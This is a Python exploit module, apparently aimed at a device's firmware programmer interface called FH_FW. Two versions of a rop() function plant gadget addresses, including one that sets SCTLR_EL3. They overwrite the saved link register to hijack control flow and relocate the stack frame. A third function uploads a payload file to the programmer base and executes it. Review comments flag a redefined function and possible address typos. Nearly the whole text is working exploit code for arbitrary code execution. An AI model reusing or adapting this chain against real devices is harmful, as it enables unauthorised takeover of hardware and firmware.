def rop():
    """Earlier chain variant built from absolute addresses.

    Copies the original stack region to a second location, then plants the
    gadget addresses and the overwritten saved LR through ``FH_FW``.

    NOTE(review): a later ``def rop()`` in this module rebinds the name, so
    after import this version is unreachable via ``rop`` unless it was called
    before the second definition ran.
    NOTE(review): 0x256 (598 bytes) is an unusual copy length — confirm it was
    not meant to be 0x100 / 256. Likewise 0xFEC04f88 lies outside the
    0xFEC03F88..0xFEC040a0 range every other write here uses — confirm it is
    not a typo for 0xFEC03f88.
    """
    target = t.get()

    # Duplicate the original stack region and its 8-byte tail.
    for dst, src, length in ((0xFEC040a0, 0xFEC03F90, 0x256),
                             (0xFEC04098, 0xFEC03F88, 8)):
        FH_FW.copy(dst, src, length)

    # (address, value) writes, in the original order; the saved LR goes last.
    writes = (
        (0xFEC04060, 0xF803DF38),            # gadget_set_sctlr_el3
        (0xFEC04f88, 0),                     # saved x1 = 0
        (0xFEC03f90, 0xf800e280),            # gadget_blr_x4
        (target.saved_lr_addr, 0xF803E848),  # super gadget F803E848
    )
    for addr, value in writes:
        FH_FW.poke64(addr, value)
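def rop():
    """Stage the ROP chain in the target's saved frame through ``FH_FW``.

    All writes are offsets from ``target.saved_lr_addr``. The original frame
    is relocated with ``FH_FW.copy_and_rebase`` and the original saved LR is
    re-planted at the end of the relocated copy; the saved-LR slot itself is
    overwritten last with ``GADGET_ADD_SP``. The register names in the
    trailing comments are the author's annotations of which slot each value
    is restored into and are not verified here.

    The previous revision carried a large block of commented-out / dead
    string code; it has been removed, the live write sequence is unchanged.

    NOTE(review): this definition rebinds ``rop`` over an earlier one in the
    same module; only this version is bound after import.
    """
    target = t.get()
    base = target.saved_lr_addr

    # Register slots restored by the chain.
    FH_FW.poke64(base + 0x1f0, 0x0)     # x1
    FH_FW.poke64(base + 0x108, 0x98)    # x28
    FH_FW.poke64(base + 0x128, 0x1)     # x24
    FH_FW.poke64(base + 0x130, 0x1000)  # X25
    # Two slots pointing into the relocated frame (+0x218 + 0x28).
    FH_FW.poke64(base + 0x160, base + 0x218 + 0x28)
    FH_FW.poke64(base + 0x200, base + 0x218 + 0x28)

    # Relocate 0x210 bytes of the original frame (starting just past the
    # saved LR) to +0x218, then re-plant the original return address after it
    # — presumably so execution can resume on the original path; confirm.
    FH_FW.copy_and_rebase(base + 0x218, base + 8, 0x210)
    FH_FW.poke64(base + 0x210, target.saved_lr)
    FH_FW.poke64(base + 0x110, base + 0x208)  # NOTE(review): looks like a new SP slot — confirm

    # Gadget addresses, then the saved-LR overwrite last so the frame is
    # fully prepared before control can be diverted.
    FH_FW.poke64(base + 0x1a8, GADGET_SCTLR_EL1)
    FH_FW.poke64(base + 0xf8, GADGET_BLR_X8)
    FH_FW.poke64(base + 0xf0, GADGET_SUPER)
    FH_FW.poke64(base, GADGET_ADD_SP)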
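def upload_init64(payload="../device/build/init64.payload"):
    """Upload the init64 payload to the target's programmer base and run it.

    Args:
        payload: Path handed to ``FH_FW.sendfile``. Defaults to the build-tree
            location the original code hard-coded. It is resolved relative to
            the current working directory, not to this file, so callers
            invoked from elsewhere should pass an explicit path.

    The sequence is: write a marker word at ``fh_base_programmer``, upload the
    file over it, then ``exe64`` at the same address. The marker is overwritten
    by the upload; presumably it is only a writability probe — confirm.
    """
    target = t.get()
    base = target.fh_base_programmer

    FH_FW.poke64(base, 0x12345678)
    FH_FW.sendfile(payload, base)
    FH_FW.exe64(base)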